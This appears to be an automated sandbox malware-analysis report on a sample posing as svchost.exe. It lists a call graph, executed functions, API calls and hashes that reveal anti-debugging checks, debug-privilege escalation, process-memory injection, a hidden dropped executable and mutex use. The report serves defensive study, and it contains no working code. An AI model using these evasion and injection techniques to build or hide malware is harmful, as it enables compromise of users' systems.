Function_00007FF7E52B4404 65->88 66 Function_00007FF7E52BBEAD 67 Function_00007FF7E52B33AC 67->5 68->1 85 Function_00007FF7E52B1000 68->85 70 Function_00007FF7E52BE999 71 Function_00007FF7E52BE997 72 Function_00007FF7E52B359D 73 Function_00007FF7E52B2F9C 73->45 73->58 73->59 104 Function_00007FF7E52B46E4 73->104 105 Function_00007FF7E52B40E4 73->105 74 Function_00007FF7E52BE99B 75 Function_00007FF7E52BD615 76 Function_00007FF7E52BD915 79 Function_00007FF7E52B3609 80 Function_00007FF7E52BB508 81 Function_00007FF7E52BE008 83 Function_00007FF7E52B2F0C 84 Function_00007FF7E52BC501 86 Function_00007FF7E52BD904 88->4 89 Function_00007FF7E52BABF9 90 Function_00007FF7E52BC2F9 91 Function_00007FF7E52BABF7 92 Function_00007FF7E52BC2F7 93 Function_00007FF7E52B36FC 94 Function_00007FF7E52BABFB 95 Function_00007FF7E52BABF2 96 Function_00007FF7E52BBCF1 97 Function_00007FF7E52BC2F5 98 Function_00007FF7E52BB2F4 99 Function_00007FF7E52BE8F3 100->45 100->58 100->59 100->104 100->105 102 Function_00007FF7E52B31EC 102->38 103 Function_00007FF7E52B36EC 104->35 105->62 107 Function_00007FF7E52BB3DA 108 Function_00007FF7E52BEFD8 109 Function_00007FF7E52BA0DD 110 Function_00007FF7E52B1CDC 111 Function_00007FF7E52B30DC 111->14 111->15 111->26 111->60 111->64

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 00007FF7E52B345C Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 143COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 231 7ff7e52b345c-7ff7e52b3472 call 7ff7e52b10a0 call 7ff7e52b321c 236 7ff7e52b3474-7ff7e52b3476 ExitProcess 231->236 237 7ff7e52b347c-7ff7e52b34aa call 7ff7e52b4264 call 7ff7e52b3ce4 call 7ff7e52b3f14 231->237 244 7ff7e52b34fb-7ff7e52b350e call 7ff7e52b3f14 237->244 245 7ff7e52b34ac-7ff7e52b34bd call 7ff7e52b43a4 237->245 250 7ff7e52b3510-7ff7e52b3521 call 7ff7e52b43a4 244->250 251 7ff7e52b354c-7ff7e52b355f call 7ff7e52b3f14 244->251 252 7ff7e52b34d2-7ff7e52b34d4 ExitProcess 245->252 253 7ff7e52b34bf-7ff7e52b34d0 call 7ff7e52b43a4 245->253 262 7ff7e52b3523-7ff7e52b3525 ExitProcess 250->262 263 7ff7e52b352b call 7ff7e52b327c 250->263 260 7ff7e52b3561-7ff7e52b3572 call 7ff7e52b43a4 251->260 261 7ff7e52b35a2-7ff7e52b35b8 call 7ff7e52b3a74 call 7ff7e52b33ec 251->261 253->252 264 7ff7e52b34da call 7ff7e52b32ec 253->264 273 7ff7e52b3574-7ff7e52b3576 ExitProcess 260->273 274 7ff7e52b357c call 7ff7e52b327c 260->274 283 7ff7e52b35ba-7ff7e52b35cb call 7ff7e52b43a4 261->283 284 7ff7e52b360e-7ff7e52b36d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 261->284 270 7ff7e52b3530-7ff7e52b3535 263->270 272 7ff7e52b34df-7ff7e52b34e4 264->272 275 7ff7e52b3544-7ff7e52b3546 ExitProcess 270->275 276 7ff7e52b3537-7ff7e52b3542 Sleep 270->276 278 7ff7e52b34e6-7ff7e52b34f1 Sleep 272->278 279 7ff7e52b34f3-7ff7e52b34f5 ExitProcess 272->279 282 7ff7e52b3581-7ff7e52b3586 274->282 276->270 278->272 285 7ff7e52b3595-7ff7e52b3597 ExitProcess 282->285 286 7ff7e52b3588-7ff7e52b3593 Sleep 282->286 289 7ff7e52b35e0-7ff7e52b35e2 ExitProcess 283->289 290 7ff7e52b35cd-7ff7e52b35de call 7ff7e52b43a4 283->290 286->282 290->289 293 7ff7e52b35e8 call 7ff7e52b32ec 290->293 295 7ff7e52b35ed-7ff7e52b35f2 293->295 296 7ff7e52b3601-7ff7e52b3603 ExitProcess 295->296 297 7ff7e52b35f4-7ff7e52b35ff Sleep 295->297 297->295
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                          • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                          • API String ID: 613740775-1953711635
                                                                                                                                                                                                                          • Opcode ID: 14c2fa25876479cd5c5c4ade1a135fd90693f5b51d36c120125410f70aa3ba6a
                                                                                                                                                                                                                          • Instruction ID: 6a37a3d3dbbfe9a4201a1053f5dcbc6d8c39727c968cec8ce2592b0b5e5a105d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14c2fa25876479cd5c5c4ade1a135fd90693f5b51d36c120125410f70aa3ba6a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66610EA0A1CA5B81EBE4B731AC7537AA268AF9CF01FD44137D45EC61E1CE3DE5058232
                                                                                                                                                                                                                          Function 00007FF7E52B40E4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                                                                          • API String ID: 2379135442-2896544425
                                                                                                                                                                                                                          • Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                                          • Instruction ID: f4f1afc37bda6ab2966feee90dab60963b9cafca664fda60ee59a040e09569d8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD41B17291868586E790DB10F86431AF7A5FBC8B44F904136EA8983A98CF7DD448CF51
                                                                                                                                                                                                                          Function 00007FF7E52B4264 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 434396405-0
                                                                                                                                                                                                                          • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                                          • Instruction ID: 7f8dff981f72ea310a778e564df07ac2d989e100c879d5eeba9dd70d8ccdef55
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14311C72A1C64586DB94DB15E8A072EF768FBC8B80F545136FA8E83B68DF3CD4418B11
                                                                                                                                                                                                                          Function 00007FF7E52B2CB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82memoryinjectionCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 4073123320-2766056989
                                                                                                                                                                                                                          • Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                                          • Instruction ID: 8bd6eb75e1dd366afb0af4d1cc9c21161b6f15c8e3c874c67a4402ec841e8451
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE41E47260CB8986E7B0DB15E86436BB7A4F788B84F504126EACD83B58DF7DE4448B41
                                                                                                                                                                                                                          Function 00007FF7E52B46E4 Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2693768547-0
                                                                                                                                                                                                                          • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                                          • Instruction ID: b869d4c742584af1cf125b9547f8ae6701698a2acdf4f693115a0e6ca67554e8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2812172A08B8582EB50DB55F89436AF7A5FBC9B90F504136EA8D87B68DF3CD044CB11
                                                                                                                                                                                                                          Function 00007FF7E52B38C4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7E52B3784
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3744: GetVolumeInformationW.KERNELBASE ref: 00007FF7E52B3801
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3744: wsprintfW.USER32 ref: 00007FF7E52B38A2
                                                                                                                                                                                                                          • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B390D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3922
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3935
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3945
                                                                                                                                                                                                                          • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3958
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B396D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3980
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3995
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: .exe
                                                                                                                                                                                                                          • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                          • Opcode ID: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                                                                          • Instruction ID: 39e499edb2183f20f55127a5609ddfabdb163c6d6e592bf69cfb54d3bbb0af6a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC11516162898A81DFA4AF25FC6436AA365FBC8F80F845033DA4E87A28DE3CD104C711
                                                                                                                                                                                                                          Function 00007FF7E52B4004 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2850635065-0
                                                                                                                                                                                                                          • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction ID: e8a55d8741fd77ba7457c4708f840c4cebe50378b922e222d86fb7c7cd482f0a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 561137B190C68981EBB4AB10E89836AB365FB98B54F404736C69D82698DF3DD504CB51
                                                                                                                                                                                                                          Function 00007FF7E52B3744 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                          • API String ID: 3001812590-640692576
                                                                                                                                                                                                                          • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                                          • Instruction ID: a4f14c1172be88d4579fd17a668df9162e9b1aba96832658460c891d6d0af302
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97311A6661C5C5C6DB70DB64E8983AAB3A4FB98B00F904136E68DC3A58DB3DD548CB11
                                                                                                                                                                                                                          Function 00007FF7E52B321C Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3920101602-0
                                                                                                                                                                                                                          • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                                          • Instruction ID: 4fdced95383a57ac55d12e27afe95ec88d3bf100efd3725822349d713ae0b837
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF0546190C24681EFB067556C24379A794BF59F04F844176D58D85594CF3CED05DB32
                                                                                                                                                                                                                          Function 00007FF7E52B43A4 Relevance: 4.5, APIs: 3, Instructions: 21synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4294037311-0
                                                                                                                                                                                                                          • Opcode ID: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                                                                          • Instruction ID: 38de4d05bd51f37cfddc8f89d8b6af7f5991f24882226d5ab15533cf611d4343
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02F0EC74C0C649D2DBA47B20E85537DA368FB59B00FA40232D54EC2650CF3CD0058631
                                                                                                                                                                                                                          Function 00007FF7E52B32EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3935
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3995
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B46E4: CreateFileW.KERNELBASE ref: 00007FF7E52B472B
                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 00007FF7E52B3376
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: GetCurrentProcess.KERNEL32 ref: 00007FF7E52B414B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: OpenProcessToken.ADVAPI32 ref: 00007FF7E52B415E
